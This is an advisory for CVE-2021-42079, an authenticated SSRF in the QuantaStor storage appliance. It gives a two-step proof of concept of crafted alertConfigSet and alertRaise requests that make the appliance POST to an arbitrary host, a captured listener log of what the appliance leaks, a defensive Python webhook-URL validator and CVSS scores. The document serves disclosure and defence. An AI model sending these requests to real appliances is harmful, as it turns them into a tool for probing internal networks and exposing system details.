CVE-2021-42079

EUVD-2021-29065
An authenticated administrator can configure the alert settings so that raising an alert makes the appliance perform an SSRF attack. The server-side request is always an HTTP POST.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<TARGET>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0

Step 2: Trigger the alert with this request:

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1

The POST request received by <TARGET> looks like this (captured with a Python Flask listener; the dict is the logged Flask request object, and the 'data' entry is the body the appliance sent):

{
 'endpoint': 'index',
 'method': 'POST',
 'cookies': ImmutableMultiDict([]),
 'data': b'{
  "attachments": [
   {
    "fallback": "[122] test / test.",
    "color": "#aa2222",
    "title": "[122] test",
    "text": "test",
    "fields": [
     {
      "title": "Alert Severity",
      "value": "CRITICAL",
      "short": false
     }, {
      "title": "Appliance",
      "value": "quantastor (https://<HOSTNAME>)",
      "short": true
     }, {
      "title": "System / Driver / Kernel Ver",
      "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
      "short": false
     }, {
      "title": "System Startup",
      "value": "Fri Aug  6 16-02-55 2021",
      "short": true
     }, {
      "title": "SSID",
      "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
      "short": true
     },
    ],
    "footer": "QuantaStor Call-home Alert",
    "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
    "ts": 1628461774
   }
  ],
  "mrkdwn":true
 }',
 'headers': {
  'Host': '<redacted>',
  'User-Agent': 'curl/7.58.0',
  'Accept': '*/*',
  'Content-Type': 'application/json',
  'Content-Length': '790'
 },
 'args': ImmutableMultiDict([]),
 'form': ImmutableMultiDict([]),
 'remote_addr': '217.103.63.173',
 'path': '/payload/58',
 'whois_ip': 'TNF-AS, NL'
}
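The root cause is that alertConfigSet stores whatever slackWebhookUrl and mattermostWebhookUrl it is given, and alertRaise later POSTs to them. As an added defensive example (not QuantaStor's code), the following check validates such a webhook URL at configuration time: it requires https, rejects embedded credentials, optionally restricts the host to an allowlist of webhook providers, and refuses any host that is, or resolves to, a non-public address. The allowlist contents and the injectable resolve hook are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed allowlist of hosts an alert webhook may point at; an appliance only
# needs to reach its chat provider's hook endpoint, not arbitrary hosts.
WEBHOOK_HOST_ALLOWLIST = frozenset({"hooks.slack.com"})


def resolve_all(hostname):
    """Every address the name currently maps to (IPv4 and IPv6)."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def check_webhook_url(url, allowlist=WEBHOOK_HOST_ALLOWLIST, resolve=resolve_all):
    """Return (ok, reason) for a webhook URL submitted via alertConfigSet.

    Rejects plain http, embedded credentials, hosts outside the allowlist
    (pass allowlist=None to rely on the address checks alone) and any host
    that is, or resolves to, a loopback, link-local, private or otherwise
    non-public address, so a raised alert cannot be turned into a request
    to the appliance's own network.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparsable URL"
    if parts.scheme != "https":
        return False, "scheme must be https"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials embedded in URL"
    if allowlist is not None and host not in allowlist:
        return False, "host %r is not an allowed webhook provider" % host
    try:
        addrs = [ipaddress.ip_address(host)]  # host is an IP literal
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (OSError, ValueError):
            return False, "host does not resolve"
    # Check every address, not just the first: a name mapping to one public
    # and one internal address must still be refused.
    for addr in addrs:
        if not addr.is_global:
            return False, "host maps to non-public address %s" % addr
    return True, "ok"
```

The check only covers the value at configuration time; the code that sends the alert should connect to the address that passed validation rather than resolving the name again.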
Weakness type: SSRF

CVSS scores

Provider  Type     Base score  Attack vector  Attack complexity  Privileges required  Vector
NIST      Primary  6.2 MEDIUM  NETWORK        LOW                HIGH                 CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N
DIVD      CNA      6.2 MEDIUM  NETWORK        LOW                HIGH                 CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N